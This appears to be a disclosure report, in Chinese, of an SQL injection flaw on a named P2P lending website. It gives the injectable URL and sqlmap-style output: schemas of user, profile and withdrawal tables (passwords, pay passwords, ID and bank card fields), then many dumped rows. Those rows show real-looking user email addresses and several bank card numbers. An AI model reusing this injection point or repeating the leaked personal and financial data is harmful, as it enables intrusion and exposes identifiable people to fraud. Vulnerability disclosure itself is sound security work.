2015-07-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-09-12: 厂商已经主动忽略漏洞,细节向公众公开
泄露上万数据
注入点:https://www.shandianjr.com/sdmall/detail?itemId=8a2b5b7d4e8d302c014e8da3bf7500ae
Database: p2p_sddTable: p2p_user[55 columns]+-------------------+---------------+| Column | Type |+-------------------+---------------+| accountType | int(11) || address | varchar(200) || appLoginStatus | int(11) || brokerId | varchar(32) || brokerRate | decimal(10,8) || brokerStatus | int(11) || busiCode | varchar(30) || cardno | varchar(22) || cardnoStatus | int(11) || createBy | varchar(32) || createTime | datetime || deleteTime | datetime || disposeRemark | varchar(1000) || disposeStatus | int(11) || email | varchar(80) || emailStatus | int(11) || guarType | varchar(2) || hfUserId | varchar(50) || id | varchar(32) || idcard | varchar(18) || idCardBeginDate | bigint(20) || idCardEndDate | bigint(20) || idCardPeriodType | int(11) || idcardStatus | int(11) || inBlackList | tinyint(1) || invitationCode | varchar(6) || InvitationMobile | varchar(22) || isDeleted | tinyint(1) || lastloginip | varchar(30) || lastlogintime | bigint(20) || logins | int(11) || mobile | varchar(22) || mobileStatus | int(11) || modify | int(11) || nickname | varchar(40) || p2pAccount_id | varchar(32) || p2pUserAccount_id | varchar(32) || p2pUserInfo_id | varchar(32) || p2pUserPoint_id | varchar(32) || password | varchar(64) || paypassword | varchar(64) || pointGetTime | bigint(20) || registerip | varchar(30) || registertime | bigint(20) || solt | varchar(10) || telephone | varchar(22) || truename | varchar(40) || updateBy | varchar(32) || updateTime | datetime || userLevel | int(11) || username | varchar(25) || usrCustId | varchar(40) || usrMp | varchar(40) || version | int(11) || virtualStatus | int(11) |+-------------------+---------------+
Database: p2p_sddTable: p2p_user_info[22 columns]+--------------+--------------+| Column | Type |+--------------+--------------+| address | varchar(255) || area | varchar(255) || birthday | bigint(20) || city | varchar(255) || createBy | varchar(32) || createTime | datetime || deleteTime | datetime || ecpName | varchar(255) || ecpRelation | int(11) || ecpTelephone | varchar(255) || id | varchar(32) || isDeleted | tinyint(1) || mobile | varchar(255) || mobile1 | varchar(255) || mobile2 | varchar(255) || msn | varchar(255) || province | varchar(255) || qq | varchar(255) || telephone | varchar(255) || updateBy | varchar(32) || updateTime | datetime || version | int(11) |+--------------+--------------+
Database: p2p_sddTable: p2p_account_cash[25 columns]+-------------------+---------------+| Column | Type |+-------------------+---------------+| amount | decimal(19,2) || bank | varchar(150) || branch | varchar(150) || cardno | varchar(22) || collected | decimal(19,2) || createBy | varchar(32) || createTime | datetime || dealno | varchar(50) || deleteTime | datetime || fee | decimal(19,2) || id | varchar(32) || ip | varchar(64) || isDeleted | tinyint(1) || p2pAccountBank_id | varchar(32) || p2pOrder_id | varchar(32) || p2pUser_id | varchar(32) || resultCode | varchar(60) || servFee | decimal(19,2) || status | int(11) || updateBy | varchar(32) || updateTime | datetime || varifyRemark | varchar(150) || varifyTime | bigint(20) || verifyManger | varchar(50) || version | int(11) |+-------------------+---------------+
可dump:(展示部分数据)
[14:27:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Apacheback-end DBMS: MySQL 5.0[14:27:33] [INFO] fetching entries of column(s) 'address, cardno, createTime, email, id, mobile, p2pAccount_id, password, paypassword, telephone, truename, username' for table 'p2p_user' in database 'p2p_sdd'[14:27:33] [INFO] retrieved: " "," ","2015-03-27 16:40:56","101","101","101",...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","15102648@qq.com",...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","848889405@qq.com"...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","365829784@QQ.com"...[14:27:34] [INFO] retrieved: " "," ","2015-03-27 16:40:56","906987642@qq.com"...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","3752987@qq.com","...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","468377@qq.com","1...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","machunyu870221@ms...[14:27:35] [INFO] retrieved: " "," ","2015-03-27 16:40:56","825336373@qq.com"...[14:27:36] [INFO] retrieved: " ","622909346304873318","2015-03-27 16:40:56","...[14:27:36] [INFO] retrieved: " "," ","2015-03-27 16:40:56","2281066038@qq.com...[14:27:36] [INFO] retrieved: " "," ","2015-03-27 16:40:56","102","102","102",...[14:27:36] [INFO] retrieved: " ","6228480470739286610","2015-03-27 16:40:56",...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","skdg999@163.com",...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","165065588@qq.com"...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1056572511@qq.com...[14:27:37] [INFO] retrieved: " "," ","2015-03-27 16:40:56","234209540@qq.com"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","602985115@qq.com"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","456587965@qq.com"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","789546@qq.com","1...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","504587414@qq.com"...[14:27:38] [INFO] retrieved: " "," ","2015-03-27 16:40:56","191120534@qq.com"...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","103","103","103",...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1773372893@qq.com...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","jsptest@sina.com"...[14:27:39] [INFO] retrieved: " "," ","2015-03-27 16:40:56","wang_doris3561@si...[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","593859125@qq.com"...[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","2530010576@qq.com...[14:27:40] [INFO] retrieved: " "," ","2015-03-27 16:40:56","840712522@qq.com"...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","153721877@qq.com"...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1355041032@qq.com...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","328642097@qq.com"...[14:27:41] [INFO] retrieved: " "," ","2015-03-27 16:40:56","751116472@qq.com"...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","104","104","104",...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","644047772@qq.com"...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","269937228@qq.com"...[14:27:42] [INFO] retrieved: " "," ","2015-03-27 16:40:56","75114812@qq.com",...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","22965634362@qq.co...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","23311114@qq.com",...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","254844102@qq.com"...[14:27:43] [INFO] retrieved: " "," ","2015-03-27 16:40:56","359502888@qq.com"...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","tsh626@163.com","...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","guohong368@yeah.n...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","abcd-50077@qq.com...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","105","105","105",...[14:27:44] [INFO] retrieved: " "," ","2015-03-27 16:40:56","suntrap73@163.com...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","xianyi97@126.com"...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","532594398@qq.com"...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","Asus01@126.com","...[14:27:45] [INFO] retrieved: " "," ","2015-03-27 16:40:56","43263669@qq.com",...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","alsoen@qq.com","1...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","760061799@qq.com"...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","963505202@qq.com"...[14:27:46] [INFO] retrieved: " "," ","2015-03-27 16:40:56","470991045@qq.com"...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1256387776@qq.com...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","106","106","106",...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","hejh27@126.com","...[14:27:47] [INFO] retrieved: " ","6222023100037069205","2015-03-27 16:40:56",...[14:27:47] [INFO] retrieved: " "," ","2015-03-27 16:40:56","hellfy@163.com","...[14:27:48] [INFO] retrieved: " "," ","2015-03-27 16:40:56","hellfy@126.com","...[14:27:48] [INFO] retrieved: " "," ","2015-03-27 16:40:56","wjg_ws@163.com","...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","46258407@qq.com",...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1585668092@qq.com...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","254984200@qq.com"...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","120871707@qq.com"...[14:27:49] [INFO] retrieved: " "," ","2015-03-27 16:40:56","95327586@qq.com",...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","107","107","107",...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","wslar11@2980.com"...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","xncxxw@qq.com","1...[14:27:50] [INFO] retrieved: " "," ","2015-03-27 16:40:56","252438970@qq.com"...[14:27:51] [INFO] retrieved: " ","6217002390000517497","2015-03-27 16:40:56",...[14:27:51] [INFO] retrieved: " "," ","2015-03-27 16:40:56","82289585@qq.com",...[14:27:51] [INFO] retrieved: " ","6215593100001469450","2015-03-27 16:40:56",...[14:27:51] [INFO] retrieved: " ","6214850230403088","2015-03-27 16:40:56","73...[14:27:51] [INFO] retrieved: " "," ","2015-03-27 16:40:56","25878577676@qq.co...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","zhangxuelovegang@...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","972156790@qq.com"...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","108","108","108",...[14:27:52] [INFO] retrieved: " "," ","2015-03-27 16:40:56","dreamlang@yeah.ne...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","lhf0601@163.com",...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","cnkmmc@163.com","...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1309267374@qq.com...[14:27:53] [INFO] retrieved: " "," ","2015-03-27 16:40:56","www.470654506@qq....[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","eahui@vip.qq.com"...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","756629052@qq.com"...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","36260086@qq.com",...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","381008078@qq.com"...[14:27:54] [INFO] retrieved: " "," ","2015-03-27 16:40:56","1634696789@qq.com...[14:27:55] [INFO] retrieved: " "," ","2015-03-27 16:40:56","109","109","109",...[14:27:55] [INFO] retrieved: " ","6214830232822972","2015-03-27 16:40:56","95...
公司发展ing,漏洞要赶紧补
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
